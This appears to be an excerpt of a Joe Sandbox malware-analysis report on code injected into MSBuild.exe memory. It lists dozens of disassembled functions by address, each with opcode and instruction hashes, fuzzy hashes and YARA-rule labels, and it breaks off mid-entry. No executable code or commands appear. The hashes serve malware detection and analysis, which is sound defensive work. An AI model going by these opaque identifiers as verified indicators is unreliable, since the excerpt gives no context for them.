Opcode ID: 76c6c02363ecdd46bf326603a8921956f26bd1268785f1eec154012edb5d7b1a
Instruction ID: 5adf7d669d25d98d20f7fe9e99324255000d60307b49fed8c2e79a7cd6230508
Opcode Fuzzy Hash: 76c6c02363ecdd46bf326603a8921956f26bd1268785f1eec154012edb5d7b1a
Instruction Fuzzy Hash: 7BE092721009949BC725BB29DD01FCA7BAAEB64764F014529B19597190CA30A950CB84

Function 01104000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 89cfefa9f960197d98f714bc3b0b901a160b8b7ae0f15ca7b892f573ef75bd89
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: 78E0C9347003058FE715CF19C080B927BB6BFD5610F28C068A9488F649EB72E842CB40

Function 0113B3D0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
Instruction ID: d1bd71c263294cf8f9f61a6372edacd9039609d34e297b94eb399e8b2e88be3c
Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
Instruction Fuzzy Hash: BEE0CD31248519B7DB261A54CC00FA57715DB90790F104031FA4C5A650D6719D51D6D8

Function 0107823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: 6458ae04a6b702055a2143919cb08ab2912c8ee193ce826a591136033011747f
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 73E08C31900A54EEDB322F26DC04B9976A1FB54B11F11886AE0CA0A8A48A70AC82DF48

Function 01082050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ba260107d366da611866c9488d7141de65dd43c98f868e50dc302ba4010b53
Instruction ID: 1c7859dfa3a5cd826b463a7365f17a89bf003bf67324a14ee3e345889376b68d
Opcode Fuzzy Hash: f0ba260107d366da611866c9488d7141de65dd43c98f868e50dc302ba4010b53
Instruction Fuzzy Hash: D7E0C232100894ABC721FB6DDD10F8A77AEEFA4260F000121F1D4CB290CA20AD40C794

Function 011092BC Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f66fa0c0541a2f415fb6e324e6fed35d2c7c4c19f75eb9166738fef3b92d4e38
Instruction ID: 5d44a37d686973d2750c41bbd927126877bfd927e919c5271c5a6762431bd58b
Opcode Fuzzy Hash: f66fa0c0541a2f415fb6e324e6fed35d2c7c4c19f75eb9166738fef3b92d4e38
Instruction Fuzzy Hash: 9AF0C234655B84CBE62EDF08C1B1B5177BAFB85B44F500468D44A8BBA2C73AA982CF40

Function 0107B562 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
Instruction ID: 280abd9abede05d627dce8333527a8b2013a598571e37fff21173ddd2a7ab9f8
Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
Instruction Fuzzy Hash: 8FD05B31561650AFD7316F25EE05FC27EB5AF90B10F0505547185564F08571DD84D794

Function 010BE59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 76b7b4a3bdec600b486d17adc31fbe9e639678fd8716cfb4ea06fb82d7000f34
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: AFD0A932204A64ABDBB2AA2CFC00FC333E8BB88720F060499B048CB051C360AC81CA84

Function 0107A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: 490a79f71bb84d1c0a54657ea538ddd5b4d642561c3c027ab697eb8b82800c0d
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 91D02232713070D7DF2956656810FAB6905AB80A90F0E006C340AD3800C0048C83D6E0

Function 010902A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: 94632f2ed0829f50663fc9096ad14bcf75ce18d7547a77d1400a6f9ea069344b
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 12D09235212A80CFDB5A8B0DC5A4B1533E8BB44B44F8104D0E482CBB66D628D980DA00

Function 0110930B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction ID: 23cb5c2c19822c5ca8e9d5d1e24a1b291b3a6db11ba16eb6299319034621c0b4
Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction Fuzzy Hash: 86D01735945AC88FE72BCB18C165B507BF4F705B44F855098E0464BBE3C3BC9984CB00

Function 010A0310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 16dd6114044ad26a714ad8234e7409a4cfa9bbbca9be4388123f7b875a13565e
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 2ED0123710024CEFCB01DF81C890D9A772AFBD8710F508019FD190B610CA31ED62DA50

Function 010A340D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
Instruction ID: 720d36173af97a5688bb8099e5eb595c9b840b8bad462efcc3668db108412d6d
Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
Instruction Fuzzy Hash: E9C08CB81419896AEF2B5794C910B6A3A90BB00606FC401DCBBC46D4A2C768A8028718

Function 010C3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c367a7a73f32f3a19ccd78391ec176f60a144906f8683c509720baef597335f6
Instruction ID: 013d9097e31262e8d932d5a6bf1782e161c0641e20f9ee7ef48a890494d0f334
Opcode Fuzzy Hash: c367a7a73f32f3a19ccd78391ec176f60a144906f8683c509720baef597335f6
Instruction Fuzzy Hash: 6490022520195442E140725C8804B0F411597E1202F95C01AE4556554CC91589555722

Function 010C3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
Instruction ID: cfaaafe9771839168c619591c60e100dd126ffec722574b78cbdf098f969b0bd
Opcode Fuzzy Hash: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
Instruction Fuzzy Hash: 9590022524151802E140715CC4147070016D7D0601F55C012E0424554DC6168A6567B2

Function 010C4340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
Instruction ID: ed5a516fa6b38b7f2f1d80e13d65822a27558f884b6d789d2e74400fe52d2c97
Opcode Fuzzy Hash: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
Instruction Fuzzy Hash: 8690023560591012A140715C88845464015A7E0301B55C012E0824554CCA148A565362

Function 010C4650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
Instruction ID: b50b7bbfca148bafb12487d1d1b6c65ebec9e1a8ee3b04032b9aafd3d8ad8af1
Opcode Fuzzy Hash: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
Instruction Fuzzy Hash: 45900265601610425140715C88044066015A7E1301395C116E0954560CC6188955936A

Function 010C39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
Instruction ID: f4dcbe2f876b82df825029d6e11a5b883b781860671f80d9dd05dfc58195520b
Opcode Fuzzy Hash: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
Instruction Fuzzy Hash: DC90022524556102E150715C84046164015B7E0201F55C022E0C14594DC55589556322

Function 010C2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa736e05d71b532488073c1d8e7eb637f40b800e98f0c9c4519815564e54a9f8
Instruction ID: ac004e06c9c71e36a80ae1afa386c36438b5bf6d980b0c3168367c7900d40e11
Opcode Fuzzy Hash: aa736e05d71b532488073c1d8e7eb637f40b800e98f0c9c4519815564e54a9f8
Instruction Fuzzy Hash: 3490023520151802E104715C8804686001597D0301F55C012E6424655ED66589917232

Function 010C2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd091f055c858667016e2a0a40fc1f957963f2f33b6de58c29eb285ba98b1b4a
Instruction ID: 66baa0988b91f88bae7567c4a065ba0ca8ace8b7a238814669fc1d18d5efbc5a
Opcode Fuzzy Hash: bd091f055c858667016e2a0a40fc1f957963f2f33b6de58c29eb285ba98b1b4a
Instruction Fuzzy Hash: 1390023560551802E150715C8414746001597D0301F55C012E0424654DC7558B5577A2

Function 010C2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b42778062a81e522a321209be3c14306084f86a0049105c92e2f13f290d0fef4
Instruction ID: 7b6de717d04d578439c8de3000176107b49d1e69da826d01f98aa7a10c0c4ff8
Opcode Fuzzy Hash: b42778062a81e522a321209be3c14306084f86a0049105c92e2f13f290d0fef4
Instruction Fuzzy Hash: BB90023520555842E140715C8404A46002597D0305F55C012E0464694DD6258E55B762

Function 010C2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 190576c7258472dc8d2d91b080da80d7395272e162186a25e7c8e3f6933002b9
Instruction ID: c066160ec28f5beb0148435097454f2a55734d6d649a9c50b8d031d6b0a14ff6
Opcode Fuzzy Hash: 190576c7258472dc8d2d91b080da80d7395272e162186a25e7c8e3f6933002b9
Instruction Fuzzy Hash: E690023520151802E180715C840464A001597D1301F95C016E0425654DCA158B5977A2

Function 010C2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 482c097b452e64ef4ef878ff03e8b4a3f6e8a88e2094564eafb24fa1f250745a
Instruction ID: 5df8430bafc2a96321f66e6d40a622b5b92e571b16583fdc0f3f62be33814369
Opcode Fuzzy Hash: 482c097b452e64ef4ef878ff03e8b4a3f6e8a88e2094564eafb24fa1f250745a
Instruction Fuzzy Hash: F89002A5201650925500B25CC404B0A451597E0201B55C017E1454560CC52589519236

Function 010C2AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
Instruction ID: 9ff5462fbf18240dcec5d2caf507bd818b7d71cfb6c30bd12f46db22c72a8dd0
Opcode Fuzzy Hash: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
Instruction Fuzzy Hash: 3D90043D311510031105F55C47045070057D7D5351355C033F1415550CD731CD715333

Function 010C2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
Instruction ID: 43ab85abedfba76fa2b69735bdd00e5012b9d28fe89aea4a6aa6fab7ab34c2c3
Opcode Fuzzy Hash: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
Instruction Fuzzy Hash: B2900229221510021145B55C460450B0455A7D6351395C016F1816590CC62189655322

Function 010C2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
Instruction ID: 78d799a7d9ba078d425175d8babcbec8f55bf7b33ef422a9d57828c073fb2ea6
Opcode Fuzzy Hash: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
Instruction Fuzzy Hash: B490022520555442E100755C9408A06001597D0205F55D012E1464595DC6358951A232

Function 010C3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
Instruction ID: f6021ed495f5f2aa8f8e08767c6e668882adaf536544cb56668249e49d0b7ef2
Opcode Fuzzy Hash: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
Instruction Fuzzy Hash: 2890023520251142A540725C9804A4E411597E1302B95D416E0415554CC91489615322

Function 010C2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
Instruction ID: ecfa70658b9b39eb20faddcd07cbe90cf9d34dc28c44ff2749ae8877a6ea2815
Opcode Fuzzy Hash: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
Instruction Fuzzy Hash: 2290022D21351002E180715C940860A001597D1202F95D416E0415558CC91589695322

Function 010C2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
Instruction ID: 8628e9bab6a4280b3c2e93b823e84efe5b47ea11ff470ed144b555e552725cd5
Opcode Fuzzy Hash: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
Instruction Fuzzy Hash: BE90022530151003E140715C94186064015E7E1301F55D012E0814554CD91589565323

Function 010C3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
Instruction ID: e7d6ee4cf95f8375d5b0b8343d4699337ff36a6468ed4792a5af16eb92146ff6
Opcode Fuzzy Hash: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
Instruction Fuzzy Hash: E890023920151402E510715C9804646005697D0301F55D412E0824558DC65489A1A222

Function 010C2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
Instruction ID: 222808043593ebb094aed55aed3c12b5475ba93cf97c51aeb7b8e640e2095d30
Opcode Fuzzy Hash: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
Instruction Fuzzy Hash: 5490023524151402E141715C84046060019A7D0241F95C013E0824554EC6558B56AB62

Function 010C2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
Instruction ID: d6ad78df4657e78a02ddfea4630f1a76ade5df248613fbe1764efe8a5ca789ff
Opcode Fuzzy Hash: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
Instruction Fuzzy Hash: 31900225242551526545B15C84045074016A7E0241795C013E1814950CC5269956D722

Function 010C2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
Instruction ID: 28de6fa8172aaebe58d266d7ae12fb865f6b674d50dddbd06ccadf8cb1d59fba
Opcode Fuzzy Hash: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
Instruction Fuzzy Hash: 0790023520151842E100715C8404B46001597E0301F55C017E0524654DC615C9517622

Function 010C2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
Instruction ID: fed4dc03e18a5f70cfd9e0343e8a1d65693b43233959d44e72e06ef4d0de5170
Opcode Fuzzy Hash: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
Instruction Fuzzy Hash: 3690023520151402E100759C9408646001597E0301F55D012E5424555EC66589916232

Function 010C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
Instruction ID: 28d2a9a8d34ba67b946ae3d78dbaeda62468b16f615ce5fd5bf5f0127c4643f8
Opcode Fuzzy Hash: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
Instruction Fuzzy Hash: 8990022560551402E140715C9418706002597D0201F55D012E0424554DC6598B5567A2

Function 010C2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
Instruction ID: 2c0da6c6c4ba95a3ff2d16b361e3a7cc1502462fcca474ee28911a75cc220433
Opcode Fuzzy Hash: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
Instruction Fuzzy Hash: 6C90023520151403E100715C9508707001597D0201F55D412E0824558DD65689516222

Function 010C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
Instruction ID: 10dc08da85576375132361fd9ff1884ef651609ae1adb715fbb76964588ed284
Opcode Fuzzy Hash: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
Instruction Fuzzy Hash: C790026534151442E100715C8414B060015D7E1301F55C016E1464554DC619CD526227

Function 010C2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
Instruction ID: 552f532c1675269c3b3b5824642c33acef3bd1e139ee3a15d1006b619f1bd633
Opcode Fuzzy Hash: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
Instruction Fuzzy Hash: ED90047531151043F104715CC4047070055D7F1301F55C013F3554554CC53DCD715337

Function 010C2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
Instruction ID: fa4645ee22d2b2d1daa6b35222647d3a2351f61f11ef2b2a6cf40949d43d66df
